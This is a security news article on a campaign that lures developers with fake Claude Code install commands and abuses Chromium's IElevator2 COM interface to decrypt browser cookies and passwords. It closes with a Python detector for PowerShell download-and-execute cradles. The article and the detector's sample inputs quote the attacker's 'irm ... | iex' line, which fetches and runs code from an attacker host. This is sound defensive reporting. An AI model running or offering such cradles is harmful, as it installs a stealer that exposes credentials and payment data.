A newly discovered campaign abuses Chromium-based browsers to steal developer secrets. The attackers use fake installers and abuse the IElevator2 COM interface to reach sensitive browser data.
A recent campaign has been discovered targeting developers who use Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. The attackers use fake installers for popular coding tools, including Claude Code, to steal sensitive information from these browsers.
The attacks, which began several months ago, rely on a malicious PowerShell one-liner that mimics the legitimate installer command but points at an attacker-controlled host. The genuine command is “irm https[:]//claude[.]ai/install.ps1 | iex”; the lure keeps the same shape and replaces the destination host, becoming “irm events[.]msft23[.]com | iex”. Once run, it gives the attackers access to the victim's browser data, including decrypted cookies, passwords, and payment methods.
The malicious script also abuses the IElevator2 COM interface, which is exposed by Chromium’s elevation service and handles App-Bound Encryption (ABE), the mechanism that encrypts and decrypts sensitive user data such as cookies and passwords. The attackers use a native ABE helper to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key.
The payload does not match any documented malware family, but it shares traits with other stealers, including Glove Stealer, which also abuses IElevator through a helper module that communicates over a named pipe.
Ontinue's security researchers published a full list of elevation-service identifiers, and developers are advised to consult it to protect themselves from this malware. The researchers noted that behavioral rule sets that examine the native PE in isolation will see nothing actionable, which underlines the importance of detecting activity at the COM-call and PowerShell layers.
The attackers are believed to be using a "small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell". This orchestration model differs from the one used by Glove Stealer.
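Because the lure reuses the genuine installer's download-and-execute shape and only swaps the host, and because the researchers point to the PowerShell layer as the place where the activity is visible, one defensive check is to scan PowerShell script-block text for such cradles and flag any whose host is not the expected installer host. The following is an added example written for this article, not code from Ontinue or from the campaign; it assumes the input lines are ScriptBlockText values from PowerShell script-block logging and uses constructed samples.

```python
import re
from urllib.parse import urlparse

# Host the genuine Claude Code installer is fetched from (named in the article);
# the lure keeps the same cradle shape and swaps only this host.
EXPECTED_INSTALL_HOSTS = {"claude.ai"}

# PowerShell accepts aliases for the download and execute cmdlets, so match all
# of them rather than keying on the literal "irm ... | iex" text.
DOWNLOAD_CMDS = r"(?:irm|invoke-restmethod|iwr|invoke-webrequest)"
EXEC_CMDS = r"(?:iex|invoke-expression)"
CRADLE_RE = re.compile(
    r"\b" + DOWNLOAD_CMDS + r"\s+(?:-uri\s+)?['\"]?(?P<target>[^\s'\"|]+)['\"]?"
    r"[^|]*\|\s*" + EXEC_CMDS + r"\b",
    re.IGNORECASE,
)

def extract_host(target):
    """Lowercase host of a download target; irm accepts a bare host, so add a scheme."""
    if "://" not in target:
        target = "https://" + target
    host = urlparse(target).hostname
    return host.lower() if host else None

def classify_script_block(text):
    """None when no download-and-execute cradle is present; otherwise the cradle,
    its host, and whether that host is the one the genuine installer uses."""
    match = CRADLE_RE.search(text)
    if not match:
        return None
    host = extract_host(match.group("target"))
    verdict = "expected-host" if host in EXPECTED_INSTALL_HOSTS else "unexpected-host"
    return {"cradle": match.group(0), "host": host, "verdict": verdict}

def scan_script_blocks(blocks):
    """Classify each ScriptBlockText value; returns (index, result) for hits only."""
    return [(i, r) for i, b in enumerate(blocks) if (r := classify_script_block(b))]

# Constructed sample script blocks, not real telemetry.
SAMPLE_BLOCKS = [
    "irm https://claude.ai/install.ps1 | iex",
    "irm events.msft23.com | iex",
    "Invoke-RestMethod -Uri 'https://events.msft23.com/setup.ps1' | Invoke-Expression",
    "Get-ChildItem C:\\Users\\dev\\projects | Select-Object Name",
]

if __name__ == "__main__":
    for index, result in scan_script_blocks(SAMPLE_BLOCKS):
        print(index, result["verdict"], result["host"])
```

An "unexpected-host" hit on a developer workstation is the point at which to pivot to the COM-call layer the researchers describe, since the native helper itself shows nothing actionable on its own.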
To avoid falling victim to this attack, developers are advised to be cautious when downloading and installing coding tools and to verify the authenticity of the installation command before running it. Keeping browsers up to date and using reputable security software also helps protect against attacks of this kind.
The Ontinue team's discovery highlights the importance of staying vigilant in the face of evolving cyber threats, particularly those targeting developers who use Chromium-based browsers.